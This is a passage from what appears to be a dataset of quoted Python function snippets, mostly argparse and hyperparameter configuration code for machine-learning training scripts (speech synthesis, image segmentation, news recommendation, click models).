classifier')\n\n parser.add_argument('-no',\n '--non-overlap',\n dest='non_overlap',\n action='store_true',\n default=False)\n\n parser.add_argument('-nocs',\n '--non-overlap-chunk-size',\n dest='non_overlap_chunk_size',\n action='store',\n default=10)\n\n parser.add_argument('-umm',\n '--use-min-max',\n dest='use_min_max',\n action='store_true',\n default=False)\n\n parser.add_argument('features_dir',\n action='store',\n type=str,\n help='Path to directory where feature files are stored')\n\n parser.add_argument('output_dir',\n action='store',\n type=str,\n help='Path to directory where output files will be stored')\n\n parser.add_argument('fold_num',\n action='store',\n type=int,\n help='Fold ordinal to train/test with')\n\n return vars(parser.parse_args())", "def define_and_process_args():\n\n description = main.__doc__\n formatter_class = argparse.ArgumentDefaultsHelpFormatter\n parser = argparse.ArgumentParser(description=description,\n formatter_class=formatter_class)\n\n parser.add_argument('--data_dir', default='~/Data/JIGSAWS/Suturing',\n help='Data directory.')\n parser.add_argument('--data_filename', default='standardized_data.pkl',\n help='''The name of the standardized-data pkl file that\n resides in data_dir.''')\n parser.add_argument('--test_users', default='B',\n help='''A string of the users that make up the test set,\n with users separated by spaces.''')\n\n parser.add_argument('--model_type', default='BidirectionalLSTM',\n help='''The model type, either BidirectionalLSTM,\n ForwardLSTM, or ReverseLSTM.''')\n parser.add_argument('--num_layers', type=int, default=1,\n help='The number of hidden layers.')\n parser.add_argument('--hidden_layer_size', type=int, default=1024,\n help='The number of hidden units per layer.')\n parser.add_argument('--dropout_keep_prob', type=float, default=0.5,\n help='''The fraction of inputs to keep whenever dropout\n is applied.''')\n\n parser.add_argument('--batch_size', type=int, default=5,\n help='The number of sequences in a batch/sweep.')\n parser.add_argument('--num_train_sweeps', type=int, default=600,\n help='''The number of training sweeps. A sweep\n is a collection of batch_size sequences that\n continue together throughout time until all\n sequences in the batch are exhausted. 
Short\n sequences grow by being wrapped around in\n time.''')\n parser.add_argument('--initial_learning_rate', type=float, default=1.0,\n help='The initial learning rate.')\n parser.add_argument('--num_initial_sweeps', type=int, default=300,\n help='''The number of initial sweeps before the\n learning rate begins to decay.''')\n parser.add_argument('--num_sweeps_per_decay', type=int, default=50,\n help='''The number of sweeps per learning-rate decay,\n once decaying begins.''')\n parser.add_argument('--decay_factor', type=float, default=0.5,\n help='The multiplicative learning-rate-decay factor.')\n parser.add_argument('--max_global_grad_norm', type=float, default=1.0,\n help='''The global norm is the norm of all gradients\n when concatenated together. If this global norm\n exceeds max_global_grad_norm, then all gradients\n are rescaled so that the global norm becomes\n max_global_grad_norm.''')\n\n parser.add_argument('--init_scale', type=float, default=0.1,\n help='''All weights will be initialized using a\n uniform distribution over\n [-init_scale, init_scale].''')\n parser.add_argument('--num_sweeps_per_summary', type=int, default=7,\n help='''The number of sweeps between summaries. Note:\n 7 sweeps with 5 sequences per sweep corresponds\n to (more than) 35 visited sequences, which is\n approximately 1 epoch.''')\n parser.add_argument('--num_sweeps_per_save', type=int, default=7,\n help='The number of sweeps between saves.')\n\n args = parser.parse_args()\n args.data_dir = os.path.expanduser(args.data_dir)\n args.test_users = args.test_users.split(' ')\n return args", "def train(self, training_data, cfg, **kwargs):\n pass", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def load_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--batchsize\",\n help=\"the batch size of the dataloader\",\n type=int,\n default=2,\n required=False)\n parser.add_argument(\"--validsize\",\n help=\"percentage that training set split into validation set\",\n type=float,\n default=1/6,\n required=False)\n parser.add_argument(\"--input-prefix\",\n help=\"file for saving the data (.gz file)\",\n type=str,\n default=\"../mnistPC\",\n required=False)\n parser.add_argument(\"--demo\",\n help=\"if demo is true, then only load small number of images\",\n type=bool,\n default=False,\n required=False)\n parser.add_argument(\"--test\",\n help=\"if test is true, then load data from test dataset\",\n type=bool,\n default=False,\n required=False)\n parser.add_argument(\"--epochs\",\n help=\"number of epochs\",\n type=int,\n default=5,\n required=False)\n parser.add_argument(\"--learning_rate\",\n help=\"learning rate of the model\",\n type=float,\n default=1e-2,\n required=False)\n parser.add_argument(\"--num_classes\",\n help=\"number of classes for classification\",\n type=int,\n default=10,\n required=False)\n parser.add_argument(\"--num_neighbors\",\n help=\"num of neighbors for the network\",\n type=int,\n default=15,\n required=False)\n parser.add_argument(\"--cudas\",\n help=\"cuda numbera to use, if use cpu, please enter -1\",\n type=str,\n default=\"0/1/2/3\",\n required=False)\n args = parser.parse_args()\n return args", "def setup_args(cls, parser):\n pass", 
"def add_arguments(parser):\r\n group = parser.add_argument_group(\"tacotron 2 model setting\")\r\n # encoder\r\n group.add_argument(\r\n \"--embed-dim\",\r\n default=512,\r\n type=int,\r\n help=\"Number of dimension of embedding\",\r\n )\r\n group.add_argument(\r\n \"--elayers\", default=1, type=int, help=\"Number of encoder layers\"\r\n )\r\n group.add_argument(\r\n \"--eunits\",\r\n \"-u\",\r\n default=512,\r\n type=int,\r\n help=\"Number of encoder hidden units\",\r\n )\r\n group.add_argument(\r\n \"--econv-layers\",\r\n default=3,\r\n type=int,\r\n help=\"Number of encoder convolution layers\",\r\n )\r\n group.add_argument(\r\n \"--econv-chans\",\r\n default=512,\r\n type=int,\r\n help=\"Number of encoder convolution channels\",\r\n )\r\n group.add_argument(\r\n \"--econv-filts\",\r\n default=5,\r\n type=int,\r\n help=\"Filter size of encoder convolution\",\r\n )\r\n # decoder\r\n group.add_argument(\r\n \"--dlayers\", default=2, type=int, help=\"Number of decoder layers\"\r\n )\r\n group.add_argument(\r\n \"--dunits\", default=1024, type=int, help=\"Number of decoder hidden units\"\r\n )\r\n group.add_argument(\r\n \"--prenet-layers\", default=2, type=int, help=\"Number of prenet layers\"\r\n )\r\n group.add_argument(\r\n \"--prenet-units\",\r\n default=256,\r\n type=int,\r\n help=\"Number of prenet hidden units\",\r\n )\r\n group.add_argument(\r\n \"--postnet-layers\", default=5, type=int, help=\"Number of postnet layers\"\r\n )\r\n group.add_argument(\r\n \"--postnet-chans\", default=512, type=int, help=\"Number of postnet channels\"\r\n )\r\n group.add_argument(\r\n \"--postnet-filts\", default=5, type=int, help=\"Filter size of postnet\"\r\n )\r\n group.add_argument(\r\n \"--output-activation\",\r\n default=None,\r\n type=str,\r\n nargs=\"?\",\r\n help=\"Output activation function\",\r\n )\r\n # model (parameter) related\r\n group.add_argument(\r\n \"--use-batch-norm\",\r\n default=True,\r\n type=strtobool,\r\n help=\"Whether to use batch normalization\",\r\n )\r\n group.add_argument(\r\n \"--use-concate\",\r\n default=True,\r\n type=strtobool,\r\n help=\"Whether to concatenate encoder embedding with decoder outputs\",\r\n )\r\n group.add_argument(\r\n \"--use-residual\",\r\n default=True,\r\n type=strtobool,\r\n help=\"Whether to use residual connection in conv layer\",\r\n )\r\n group.add_argument(\r\n \"--dropout-rate\", default=0.5, type=float, help=\"Dropout rate\"\r\n )\r\n group.add_argument(\r\n \"--zoneout-rate\", default=0.1, type=float, help=\"Zoneout rate\"\r\n )\r\n group.add_argument(\r\n \"--reduction-factor\", default=1, type=int, help=\"Reduction factor\"\r\n )\r\n group.add_argument(\r\n \"--spk-embed-dim\",\r\n default=None,\r\n type=int,\r\n help=\"Number of speaker embedding dimensions\",\r\n )\r\n group.add_argument(\r\n \"--spc-dim\", default=None, type=int, help=\"Number of spectrogram dimensions\"\r\n )\r\n group.add_argument(\r\n \"--pretrained-model\", default=None, type=str, help=\"Pretrained model path\"\r\n )\r\n # loss related\r\n group.add_argument(\r\n \"--use-masking\",\r\n default=False,\r\n type=strtobool,\r\n help=\"Whether to use masking in calculation of loss\",\r\n )\r\n group.add_argument(\r\n \"--use-weighted-masking\",\r\n default=False,\r\n type=strtobool,\r\n help=\"Whether to use weighted masking in calculation of loss\",\r\n )\r\n # duration predictor settings\r\n group.add_argument(\r\n \"--duration-predictor-layers\",\r\n default=2,\r\n type=int,\r\n help=\"Number of layers in duration predictor\",\r\n )\r\n group.add_argument(\r\n 
\"--duration-predictor-chans\",\r\n default=384,\r\n type=int,\r\n help=\"Number of channels in duration predictor\",\r\n )\r\n group.add_argument(\r\n \"--duration-predictor-kernel-size\",\r\n default=3,\r\n type=int,\r\n help=\"Kernel size in duration predictor\",\r\n )\r\n group.add_argument(\r\n \"--duration-predictor-dropout-rate\",\r\n default=0.1,\r\n type=float,\r\n help=\"Dropout rate for duration predictor\",\r\n )\r\n return parser", "def add_models_args(parser):\r\n # Some common arguments for your convenience\r\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\r\n parser.add_argument('--epochs', type=int, default=10, help='num epochs to train for')\r\n parser.add_argument('--lr', type=float, default=1e-3)\r\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\r\n\r\n # 65 is all you need for GeoQuery\r\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\r\n\r\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\r\n # 50-200 might be a good range to start with for embedding and LSTM sizes\r", "def use_args(args):\n global DATA_PATH\n global IMAGES_FILE\n global WORKING_DIR\n global OUTPUT_DIR\n global OUTPUT_FILE_NAME\n global OUTPUT_FILE\n global LOAD_INDEXES\n global INDEXES_DIR\n global MODEL\n global JOIN_MODELS\n global MODEL1\n global MODEL2\n global ALL_TOGETHER\n global TRAINED_MODELS\n global TRAINED_MODELS_DIR\n global TRAINED_MODELS_DIR2\n global TRAINED_MODELS_DIRS\n global CROSS_VALIDATION\n global TRAIN_EPOCHS\n global FEATURES\n \n if args.data_path:\n # Change the default path of the images\n DATA_PATH = args.data_path\n IMAGES_FILE = os.path.join(DATA_PATH, IMAGES_FILE_NAME)\n \n if args.working_dir:\n # Change the default path of the working directory\n WORKING_DIR = args.working_dir\n OUTPUT_DIR = WORKING_DIR\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output_dir:\n # Change the default path of the output directory\n OUTPUT_DIR = os.path.join(WORKING_DIR, args.output_dir)\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output:\n # Change the default name of the output file\n OUTPUT_FILE_NAME = args.output\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.indexes_dir:\n # Load random and train indexes from file\n LOAD_INDEXES = True\n INDEXES_DIR = args.indexes_dir\n \n if args.model:\n # Select model\n MODEL = args.model\n \n if args.models:\n \n if not args.trained_models_dirs:\n raise Exception(\"Arg. `-M --models` requires arg. 
\"\n + \"`-T --trained_models_dirs`\")\n \n # Models to combine\n JOIN_MODELS = True\n MODEL1 = args.models[0]\n MODEL2 = args.models[1]\n \n if args.trained_models_dir:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dir\n \n if args.trained_models_dirs:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dirs[0]\n TRAINED_MODELS_DIR2 = args.trained_models_dirs[1]\n \n if args.all_together:\n # The four models together\n ALL_TOGETHER = True\n TRAINED_MODELS_DIRS = args.all_together\n \n if args.cross_validation:\n # Activate cross_validation\n CROSS_VALIDATION = True\n \n if args.train_epochs:\n # Change the default number of train epochs\n TRAIN_EPOCHS = args.train_epochs\n \n if args.features:\n # Nuber of best features to use\n FEATURES = args.features", "def training_step(self, **kwargs):\n raise NotImplementedError", "def parse_args():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--ori_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ori.pt'),\n help='source training data location.'\n )\n parser.add_argument(\n '--ref_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_ref.pt'),\n help='reference training data location.'\n )\n parser.add_argument(\n '--dict_dir', type=str, default=os.path.join(Constants.TRAIN_PATH, 'para_train_dict.pt'),\n help='token to index dictionary save location.'\n )\n parser.add_argument(\n '--epoch', type=int, default=20, help='number of training epochs'\n )\n parser.add_argument(\n '--lr', type=float, default=2.0, help='learning rate scale factor'\n )\n parser.add_argument(\n '--batch_size', type=int, default=128, help='batch size'\n )\n parser.add_argument(\n '--d_model', type=int, default=256, help='model dimension'\n )\n parser.add_argument(\n '--d_inner', type=int, default=1024, help='inner dimension'\n )\n parser.add_argument(\n '--d_k', type=int, default=64, help='dimension of key and query'\n )\n parser.add_argument(\n '--d_v', type=int, default=64, help='dimension of value'\n )\n parser.add_argument(\n '--n_trf_txt_enc_layer', type=int, default=4, help='number of text Transformer encoder layers'\n )\n parser.add_argument(\n '--n_trf_syn_enc_layer', type=int, default=2, help='number of syntax Transformer encoder layers'\n )\n parser.add_argument(\n '--n_trf_dec_layer', type=int, default=6, help='number of Transformer decoder layers'\n )\n parser.add_argument(\n '--n_txt_attn_head', type=int, default=4, help='number of text encoder attention heads'\n )\n parser.add_argument(\n '--n_syn_attn_head', type=int, default=2, help='number of syntax encoder attention heads'\n )\n parser.add_argument(\n '--dropout', type=float, default=0.1, help='dropout ratio'\n )\n parser.add_argument(\n '--tgt_emb_prj_weight_sharing', action='store_true',\n help='whether share weights between embedding and projection layers'\n )\n parser.add_argument(\n '--log', type=str, default=os.path.join('logs', 'LogFile'), help='log filepath to save'\n )\n parser.add_argument(\n '--model_save', type=str, default=os.path.join('models', 'model'),\n help='the path of the model to save'\n )\n parser.add_argument(\n '--no_cuda', action='store_true', help='disable cuda'\n )\n parser.add_argument(\n '--label_smoothing', action='store_true', help='whether use label smoothing'\n )\n parser.add_argument(\n '--n_warmup_steps', type=int, default=12800, help='number of warm-up steps'\n )\n parser.add_argument(\n '--pin_memory', 
action='store_true', help='whether pin your cuda memory during training'\n )\n parser.add_argument(\n '--random_seed', type=int, default=42\n )\n\n args = parser.parse_args()\n args.cuda = not args.no_cuda and torch.cuda.is_available()\n\n return args", "def set_training_params(use_defaults):\n if use_defaults:\n n_epochs, batch_size, epsilon = default_training_params()\n return n_epochs, batch_size, epsilon\n\n print (\"Select number of epochs to train (default 100):\")\n n_epochs = int(input())\n print (\"Select batch size (default 64):\")\n batch_size = int(input())\n print (\"Select learning rate (default 0.0001):\")\n epsilon = float(input())\n return n_epochs, batch_size, epsilon", "def fill_args(args):\n args.agent_module = 'dstar_sgolam_walker'\n args.checkpoint_path = None\n args.exp_config = 'configs/baselines/dstar_proto_sgolam.yaml'\n args.num_episodes = 25\n \n return args", "def process_args():\n\n parser = argparse.ArgumentParser(\n description='Runs MNIST Kubeflow Pipeline Sample E2E.')\n parser.add_argument(\n '--mode',\n default='all',\n help='execution mode, choose between eval, train, or all.'\n 'Default is all')\n parser.add_argument(\n '--output_path',\n default=None,\n help='output path for saving the output model file from'\n 'training step. same path is used to load the model from'\n 'for evaluation step' )\n parser.add_argument(\n '--epochs',\n default=5,\n help='number of epochs to run the training, default is 5.')\n args, _ = parser.parse_known_args()\n return args", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"Resnet-deeplab train model.\")\n\n parser.add_argument(\n '--batch_size',\n type=int,\n default=2,\n help='The batch size of each iteration.')\n parser.add_argument(\n '--epoch_size', type=int, default=50, help='The epoch size of train.')\n parser.add_argument(\n '--print_step', type=int, default=50, help='The number of print step.')\n parser.add_argument(\n '--data_dir',\n type=str,\n default='dataset',\n help='The directory of dataset')\n parser.add_argument(\n '--pretrain_model_path',\n type=str,\n default=os.path.join('pretrain_model', 'model.ckpt'),\n help='The path of pretrained model.')\n parser.add_argument(\n '--saved_model_dir',\n type=str,\n default=os.path.join('saved_model'),\n help='The path of saved model.')\n parser.add_argument(\n '--log_dir', type=str, default='logs', help='Directory of log.')\n parser.add_argument(\n '--num_classes',\n type=int,\n default=150,\n help='The number of class in the dataset.')\n parser.add_argument(\n '--input_size',\n type=str,\n default='512x512',\n help='The size of input image.')\n parser.add_argument(\n '--is_training',\n action='store_true',\n help=\n 'Whether to update the mean and variance in batch normalization layer.'\n )\n parser.add_argument(\n '--not_restore_fc',\n action='store_true',\n help='Whether to restore the last fully connected layer.')\n parser.add_argument(\n '--weight_decay',\n type=float,\n default='0.0005',\n help='Regularisation parameter for L2-loss.')\n parser.add_argument(\n '--lr', type=float, default='1e-4', help='The base learning rate.')\n parser.add_argument(\n '--power', type=float, default='0.8', help='Decay for learning rate.')\n parser.add_argument(\n '--momentum',\n type=float,\n default='0.9',\n help='Momentum component of the optimiser.')\n\n args = parser.parse_args()\n\n return args", "def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n 
self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']", "def get_args(phase):\r\n parser = argparse.ArgumentParser(description='Configuration')\r\n\r\n # Hardware specifications\r\n parser.add_argument('--seed', type=int, default=1, help='random seed')\r\n parser.add_argument(\"--device_id\", type=int, default=0, help=\"device id, default is 0.\")\r\n parser.add_argument('--device_num', type=int, default=1, help='device num, default is 1.')\r\n parser.add_argument('--platform', type=str, default=\"Ascend\", \\\r\n help='run platform, only support Ascend')\r\n parser.add_argument('--save_graphs', type=ast.literal_eval, default=False, \\\r\n help='whether save graphs, default is False.')\r\n parser.add_argument('--dataset', type=str, default=\"large\", choices=(\"large\", \"small\", \"demo\"), \\\r\n help='MIND dataset, support large, small and demo.')\r\n parser.add_argument('--dataset_path', type=str, default=None, help='MIND dataset path.')\r\n\r\n # Model specifications\r\n parser.add_argument('--n_browsed_news', type=int, default=50, help='number of browsed news per user')\r\n parser.add_argument('--n_words_title', type=int, default=16, help='number of words per title')\r\n parser.add_argument('--n_words_abstract', type=int, default=48, help='number of words per abstract')\r\n parser.add_argument('--word_embedding_dim', type=int, default=304, help='dimension of word embedding vector')\r\n parser.add_argument('--category_embedding_dim', type=int, default=112, \\\r\n help='dimension of category embedding vector')\r\n parser.add_argument('--query_vector_dim', type=int, default=208, help='dimension of the query vector in attention')\r\n parser.add_argument('--n_filters', type=int, default=400, help='number of filters in CNN')\r\n parser.add_argument('--window_size', type=int, default=3, help='size of filter in CNN')\r\n parser.add_argument(\"--checkpoint_path\", type=str, default=None, \\\r\n help=\"Pre trained checkpoint path, default is None.\")\r\n parser.add_argument('--batch_size', type=int, default=64, help='size of each batch')\r\n # Training specifications\r\n if phase == \"train\":\r\n parser.add_argument('--epochs', type=int, default=None, help='number of epochs for training')\r\n parser.add_argument('--lr', type=float, default=None, help='learning rate')\r\n parser.add_argument('--beta1', type=float, default=0.9, help='ADAM beta1')\r\n parser.add_argument('--beta2', type=float, default=0.999, help='ADAM beta2')\r\n parser.add_argument('--epsilon', type=float, default=1e-8, help='ADAM epsilon for numerical stability')\r\n parser.add_argument('--neg_sample', type=int, default=4, help='number of negative samples in negative sampling')\r\n parser.add_argument(\"--mixed\", type=ast.literal_eval, default=True, \\\r\n help=\"whether use mixed precision, default is True.\")\r\n parser.add_argument(\"--sink_mode\", type=ast.literal_eval, default=True, \\\r\n help=\"whether use dataset sink, default is True.\")\r\n parser.add_argument('--print_times', type=int, default=None, help='number of print times, default is None')\r\n parser.add_argument(\"--weight_decay\", type=ast.literal_eval, default=True, \\\r\n help=\"whether use weight decay, default 
is True.\")\r\n parser.add_argument('--save_checkpoint', type=ast.literal_eval, default=True, \\\r\n help='whether save checkpoint, default is True.')\r\n parser.add_argument(\"--save_checkpoint_path\", type=str, default=\"./checkpoint\", \\\r\n help=\"Save checkpoint path, default is checkpoint.\")\r\n parser.add_argument('--dropout_ratio', type=float, default=0.2, help='ratio of dropout')\r\n if phase == \"eval\":\r\n parser.add_argument('--neg_sample', type=int, default=-1, \\\r\n help='number of negative samples in negative sampling')\r\n if phase == \"export\":\r\n parser.add_argument('--file_format', type=str, choices=[\"AIR\", \"ONNX\", \"MINDIR\"], default='AIR', \\\r\n help='file format')\r\n parser.add_argument('--neg_sample', type=int, default=-1, \\\r\n help='number of negative samples in negative sampling')\r\n args = parser.parse_args()\r\n if args.device_num > 1:\r\n context.set_context(mode=context.GRAPH_MODE, device_target=args.platform, save_graphs=args.save_graphs)\r\n context.reset_auto_parallel_context()\r\n context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,\r\n device_num=args.device_num)\r\n init()\r\n args.rank = get_rank()\r\n args.save_checkpoint_path = os.path.join(args.save_checkpoint_path, \"ckpt_\" + str(args.rank))\r\n else:\r\n context.set_context(mode=context.GRAPH_MODE, device_target=args.platform, device_id=args.device_id,\r\n save_graphs=args.save_graphs, save_graphs_path=\"naml_ir\")\r\n args.rank = 0\r\n args.device_num = 1\r\n args.phase = phase\r\n cfg = get_dataset_config(args.dataset)\r\n args.n_categories = cfg.n_categories\r\n args.n_sub_categories = cfg.n_sub_categories\r\n args.n_words = cfg.n_words\r\n if phase == \"train\":\r\n args.epochs = cfg.epochs if args.epochs is None else args.epochs * math.ceil(args.device_num ** 0.5)\r\n args.lr = cfg.lr if args.lr is None else args.lr\r\n args.print_times = cfg.print_times if args.print_times is None else args.print_times\r\n args.embedding_file = cfg.embedding_file.format(args.dataset_path)\r\n args.word_dict_path = cfg.word_dict_path.format(args.dataset_path)\r\n args.category_dict_path = cfg.category_dict_path.format(args.dataset_path)\r\n args.subcategory_dict_path = cfg.subcategory_dict_path.format(args.dataset_path)\r\n args.uid2index_path = cfg.uid2index_path.format(args.dataset_path)\r\n args.train_dataset_path = cfg.train_dataset_path.format(args.dataset_path)\r\n args.eval_dataset_path = cfg.eval_dataset_path.format(args.dataset_path)\r\n args_dict = vars(args)\r\n for key in args_dict.keys():\r\n print('--> {}:{}'.format(key, args_dict[key]), flush=True)\r\n return args", "def __init__(self, args):\n self.args = args\n\n self.batch_size = args.meta_batch_size\n self.test_batch_size = args.test_batch_size\n self.volume_size = args.volume_size\n self.n_class = args.n_class\n self.compactness_loss_weight = args.compactness_loss_weight\n self.smoothness_loss_weight = args.smoothness_loss_weight\n self.margin = args.margin\n\n self.forward = self.forward_unet\n self.construct_weights = self.construct_unet_weights\n self.seg_loss = _get_segmentation_cost\n self.get_compactness_cost = _get_compactness_cost", "def __init__(self):\n # Number of examples per epoch of training data.\n self.num_examples_per_epoch = None \n\n # Optimizer for training the model.\n self.optimizer = \"SGD\" #default \"SGD\"\n\n # Learning rate for the initial phase of training.\n self.initial_learning_rate = 2.0 # default 2.0\n self.learning_rate_decay_factor = 0.8\n 
self.num_epochs_per_decay = 4 #default 8\n\n # If not None, clip gradients to this value.\n self.clip_gradients = 5.0\n\n # How many model checkpoints to keep.\n self.max_checkpoints_to_keep = 2", "def configure_args(self):\n super(MRTextClassifier, self).configure_args()\n\n self.add_passthru_arg(\n '--min-df', dest='min_df', default=2, type=int,\n help=('min number of documents an n-gram must appear in for us to'\n ' count it. Default: %(default)s'))\n self.add_passthru_arg(\n '--max-df', dest='max_df', default=10000000, type=int,\n help=('max number of documents an n-gram may appear in for us to'\n ' count it (this keeps reducers from running out of memory).'\n ' Default: %(default)s'))\n self.add_passthru_arg(\n '--max-ngram-size', dest='max_ngram_size',\n default=DEFAULT_MAX_NGRAM_SIZE, type=int,\n help='maximum phrase length to consider')\n self.add_passthru_arg(\n '--stop-words', dest='stop_words',\n default=', '.join(DEFAULT_STOP_WORDS),\n help=(\"comma-separated list of words to ignore. For example, \"\n \"--stop-words 'in, the' would cause 'hole in the wall' to be\"\n \" parsed as ['hole', 'wall']. Default: %(default)s\"))\n self.add_passthru_arg(\n '--short-doc-threshold', dest='short_doc_threshold',\n type=int, default=None,\n help=('Normally, for each n-gram size, we take the average score'\n ' over all n-grams that appear. This allows us to penalize'\n ' short documents by using this threshold as the denominator'\n ' rather than the actual number of n-grams.'))\n self.add_passthru_arg(\n '--no-test-set', dest='no_test_set',\n action='store_true', default=False,\n help=(\"Choose about half of the documents to be the testing set\"\n \" (don't use them to train the classifier) based on a SHA1\"\n \" hash of their text\"))", "def buildbertargs(): # type: () -> ClassificationArgs\n\n accargs = ClassificationArgs()\n accargs.num_train_epochs = 5\n accargs.fp16 = False\n accargs.overwrite_output_dir = True\n accargs.evaluate_during_training = False\n accargs.sliding_window = True\n accargs.max_seq_length = 256\n accargs.stride = 0.9\n accargs.labels_list = [1, 0]\n accargs.save_model_every_epoch = False\n accargs.silent = True\n accargs.manual_seed = 18\n\n return accargs", "def parse_args():\n parser = argparse.ArgumentParser('GACM')\n parser.add_argument('--pretrain', action='store_true',\n help='pretrain the model')\n parser.add_argument('--train', action='store_true',\n help='train the model')\n parser.add_argument('--test', action='store_true',\n help='test the model')\n parser.add_argument('--rank', action='store_true',\n help='rank on train set')\n parser.add_argument('--rank_cheat', action='store_true',\n help='rank on train set in a cheating way')\n parser.add_argument('--generate_click_seq', action='store_true',\n help='generate click sequence based on model itself')\n parser.add_argument('--generate_click_seq_cheat', action='store_true',\n help='generate click sequence based on ground truth data')\n parser.add_argument('--generate_synthetic_dataset', action='store_true',\n help='generate synthetic dataset for reverse ppl')\n parser.add_argument('--use_gpu', action='store_true',\n help='use gpu instead of cpu')\n parser.add_argument('--gpu_num', type=int, default=1,\n help='gpu_num')\n parser.add_argument('--data_parallel', action='store_true',\n help='data_parallel')\n parser.add_argument('--dataset_version', type=int, default=1,\n help='version number of the dataset that is used')\n parser.add_argument('--agent_version', type=int, default=1,\n help='version number of the 
agent that is used')\n\n train_settings = parser.add_argument_group('train settings')\n train_settings.add_argument('--optim', default='adam',\n help='optimizer type')\n train_settings.add_argument('--g_lr', type=float, default=0.001,\n help='learning rate of generator')\n train_settings.add_argument('--d_lr', type=float, default=0.01,\n help='learning rate of discriminator')\n train_settings.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n train_settings.add_argument('--momentum', type=float, default=0.99,\n help='momentum')\n train_settings.add_argument('--dropout_rate', type=float, default=0.5,\n help='dropout rate')\n train_settings.add_argument('--alpha', type=float, default=0.5,\n help='policy_surr')\n train_settings.add_argument('--beta', type=float, default=0.5,\n help='policy entropy')\n train_settings.add_argument('--gamma', type=float, default=0.99,\n help='discount factor')\n train_settings.add_argument('--tau', type=float, default=0.95,\n help='gae')\n train_settings.add_argument('--clip_epsilon', type=float, default=0.2,\n help='ppo')\n train_settings.add_argument('--batch_size', type=int, default=20,\n help='train batch size')\n train_settings.add_argument('--num_steps', type=int, default=200000,\n help='number of training steps')\n train_settings.add_argument('--num_train_files', type=int, default=1,\n help='number of training files')\n train_settings.add_argument('--num_dev_files', type=int, default=1,\n help='number of dev files')\n train_settings.add_argument('--num_test_files', type=int, default=1,\n help='number of test files')\n train_settings.add_argument('--num_label_files', type=int, default=1,\n help='number of label files')\n train_settings.add_argument('--minimum_occurrence', type=int, default=1,\n help='minimum_occurrence for NDCG')\n train_settings.add_argument('--g_step', type=int, default=4,\n help='generator is updated g_step times during one epoch')\n train_settings.add_argument('--d_step', type=int, default=1,\n help='synthetic trajectory is generated d_step times during one epoch')\n train_settings.add_argument('--k', type=int, default=1,\n help='discriminator is updated k times during one epoch')\n\n model_settings = parser.add_argument_group('model settings')\n model_settings.add_argument('--algo', default='GACM',\n help='choose the algorithm to use')\n model_settings.add_argument('--embed_size', type=int, default=100,\n help='size of the embeddings')\n model_settings.add_argument('--gru_hidden_size', type=int, default=64,\n help='size of LSTM hidden units')\n model_settings.add_argument('--critic_hidden_size', type=int, nargs='+', default=[64, 32],\n help='size of critic hidden units')\n model_settings.add_argument('--max_d_num', type=int, default=10,\n help='max number of docs in a session')\n\n path_settings = parser.add_argument_group('path settings')\n path_settings.add_argument('--train_dirs', nargs='+',\n default=['./data/train_per_query.txt'],\n help='list of dirs that contain the preprocessed train data')\n path_settings.add_argument('--dev_dirs', nargs='+',\n default=['./data/dev_per_query.txt'],\n help='list of dirs that contain the preprocessed dev data')\n path_settings.add_argument('--test_dirs', nargs='+',\n default=['./data/test_per_query.txt'],\n help='list of dirs that contain the preprocessed test data')\n path_settings.add_argument('--label_dirs', nargs='+',\n default=['data/human_label_for_GACM.txt'],\n help='list of dirs that contain the preprocessed label data')\n 
path_settings.add_argument('--human_label_dir', default='./data/human_label.txt',\n help='the dir to Human Label txt file')\n path_settings.add_argument('--load_dir', default='./outputs/models/',\n help='the dir to load models')\n path_settings.add_argument('--save_dir', default='./outputs/models/',\n help='the dir to save models')\n path_settings.add_argument('--result_dir', default='./outputs/results/',\n help='the dir to output the results')\n path_settings.add_argument('--summary_dir', default='./outputs/summary/',\n help='the dir to write tensorboard summary')\n path_settings.add_argument('--log_dir', default='./outputs/log/',\n help='path of the log file. If not set, logs are printed to console')\n\n path_settings.add_argument('--eval_freq', type=int, default=10,\n help='the frequency of evaluating on the dev set when training')\n path_settings.add_argument('--check_point', type=int, default=1000,\n help='the frequency of saving model')\n path_settings.add_argument('--patience', type=int, default=3,\n help='lr half when more than the patience times of evaluation\\' loss don\\'t decrease')\n path_settings.add_argument('--lr_decay', type=float, default=0.5,\n help='lr decay')\n path_settings.add_argument('--load_model', type=int, default=-1,\n help='load model at global step')\n path_settings.add_argument('--load_pretrain_model', type=int, default=-1,\n help='load the pretrained model at global step')\n\n return parser.parse_args()", "def get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--training', type=argparse.FileType(), default='./data/cdt.epe',\n help='epe file with training sentences.')\n parser.add_argument('--validation', type=argparse.FileType(), default='./data/cdd.epe',\n help='epe file with validation 